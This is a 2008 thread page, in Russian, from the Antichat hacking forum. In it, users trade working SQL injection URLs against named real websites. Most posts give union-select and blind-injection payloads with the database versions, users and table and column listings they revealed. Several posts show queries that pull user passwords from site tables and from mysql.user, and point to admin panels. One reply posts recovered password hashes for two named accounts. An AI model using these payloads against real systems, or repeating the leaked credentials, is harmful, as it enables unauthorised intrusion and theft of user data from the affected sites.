ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6011  
Старый 15.07.2008, 15:06
Аватар для beerhack
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

http://www.musicdsp.org/showone.php?id=-99999+union+select+1,version(),3/*

VERSION: 4.0.27-standard

******************************************

http://www.cichlidae.com/article.php?id=-99999+union+select+1,2,3,4,5,6,7,version(),9,10,11 ,12,13,14,15,16,17,18,19,20/*

VERSION: 4.1.20-log

******************************************

http://www.readingmatters.co.uk/book2.php?id=-99999+union+select+1,2,version(),4,5,6,7,8,9/*

VERSION: 5.0.45-community-log

******************************************

http://www.londyn.sk/agenturaf.php?ID=-99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,table_name,35,36+from+information_schema .tables/*

VERSION: 5.0.22
 
Ответить с цитированием

  #6012  
Старый 15.07.2008, 17:54
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

http://www.pestworks.com.au/index.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*
 
Ответить с цитированием

  #6013  
Старый 15.07.2008, 17:57
Аватар для 2la.painkiller
2la.painkiller
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944

Репутация: 0
По умолчанию

Хотел доработать
http://www.stumptuous.com/cms/
админку не могу найти =) поскажите плиз
 
Ответить с цитированием

  #6014  
Старый 15.07.2008, 18:28
Аватар для .Begemot.
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

Цитата:
Хотел доработать http://www.stumptuous.com/cms/ админку не могу найти =) поскажите плиз
Вот что нашел -
http://www.stumptuous.com/gallery2/m...turnName=album
 
Ответить с цитированием

  #6015  
Старый 15.07.2008, 18:51
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Files.exe.org.ua
Цитата:
http://files.exe.org.ua/download.php?id=999999999999'+union+select+1,2,3,4 ,5,6/*
без вывода ?
Цитата:
http://files.exe.org.ua/complete.php?id=Yot37NTTxtBkItyIqcum'%20union%20se lect%201,2,3,4,5,6,7/*
что кто думает ?
Цитата:
http://files.exe.org.ua/success.php?id=508888888888888'+union+select+passw ord+from+mysql.user/*
Climb.com.ua
Цитата:
http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,version(),3,4,5,6--
Roxo.kiev.ua
Цитата:
http://roxo.kiev.ua/showarticle.php?id=-1+union+select+1,version(),3,4,5,6/*
Food.a.ua
Цитата:
http://food.a.ua/article.php?id=1918+union+select+version()/*
Alltxt.org.ua
Цитата:
http://alltxt.org.ua/article.php?id=242+union+select+version()/*
Viptravel.com.ua
Цитата:
http://viptravel.com.ua/index.php?id=3696&show=4nalbum&do=showgall&gid=374 2+union+select+1,2,3,4,5,6,version(),8--

Последний раз редактировалось sabe; 15.07.2008 в 20:07..
 
Ответить с цитированием

  #6016  
Старый 15.07.2008, 21:27
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

www.docka.irkutskcar.ru

Цитата:
http://www.docka.irkutskcar.ru/index.php?cat=176+union+select+1,version(),user(), 4,5--
VERSION(): 5.0.51a-community-log
USER(): irkutskc_bkv@localhost
DATABASE(): irkutskc_doska

Список таблиц-столбцов:
Код:
*******************************

	wzb_cat

-------------------------------

	cat
	name
	parent
	count_items
	description
	picture
	total_items

*******************************

	wzb_details

-------------------------------

	action
	avtor
	cat
	city
	cpo
	date
	description
	details
	email
	exp_date 
	ip
	name
	period
	phone
	photo
	picture 
	pwd 
	thumbnail
	title
	url
	view

*******************************

	wzb_wish

-------------------------------

	ids
	nums

*******************************
Вывести список юзеров с паролями:
Цитата:
http://www.docka.irkutskcar.ru/index.php?cat=176+union+select+1,avtor,pwd,4,5+fro m+wzb_details--
Админка:
Цитата:
http://www.docka.irkutskcar.ru/admin/
 
Ответить с цитированием

  #6017  
Старый 15.07.2008, 23:45
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

EDU
Цитата:
http://www.si.umich.edu/lila/artifacts/bigimage.phtml?images_id=-58
таблицы не подобрал, влом было долго копаться.

Database Version: 4.0.13
Database name: lila
User name: lila@harvbannister.si.umich.edu
 
Ответить с цитированием

  #6018  
Старый 16.07.2008, 00:42
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Всероссийская Ипотечная Сеть НБИК

Цитата:
http://www.nib-nbik.ru/?alias=show&id=269'
http://www.nib-nbik.ru/?alias=show&id=269+AND+1%3Cascii(substring((versio n()),1,1))
DATABASE(): lipnbikr_spb
Цитата:
http://www.lip-nbik.ru/?alias=show&id=260'
http://www.lip-nbik.ru/?alias=show&id=260+AND+1%3Cascii(substring((versio n()),1,1))
DATABASE(): lipnbikr_lipetck
Цитата:
http://www.invest-nbik.ru/?alias=show&id=273'
http://www.invest-nbik.ru/?alias=show&id=273+AND+1%3Cascii(substring((versio n()),1,1))
DATABASE(): lipnbikr_kursk
Цитата:
http://www.sirius-nbik.ru/?alias=show&id=262'
http://www.sirius-nbik.ru/?alias=show&id=262+AND+1%3Cascii(substring((versio n()),1,1))
DATABASE(): lipnbikr_sirius


Одинаковые для всех сайтов:

VERSION(): 5.0.51a-community-log
USER(): lipnbikr_sergio@localhost
 
Ответить с цитированием

  #6019  
Старый 16.07.2008, 01:33
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от sabe  
что кто думает ?
Цитата:http://files.exe.org.ua/success.php?id=508888888888888'+union+select+passw ord+from+mysql.user/*
kove:1b56bddf16637238
kiriliuk:1b56bddf16637238

Последний раз редактировалось ~!DoK_tOR!~; 16.07.2008 в 01:45..
 
Ответить с цитированием

  #6020  
Старый 16.07.2008, 02:01
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

надо тему Антибояна важной сделать,а то так не удобно
-----------------------------------------------------------------
Код:
http://www.ccre.org/champs_activites_detail_news_en.htm?ID=963&idca=-3115+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+information_schema.tables+limit+17,11/*
Блин,Все таблицы:
T_1005,T_1006,T_1007...итд
Код:
http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-3591+union+select+1,2,3,4,5,6,7/*
--------------------------------------------------------------
Код:
http://tjp.dergisi.org/text.php3?id=-362+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
4 version

Последний раз редактировалось DDoSька; 16.07.2008 в 02:58..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ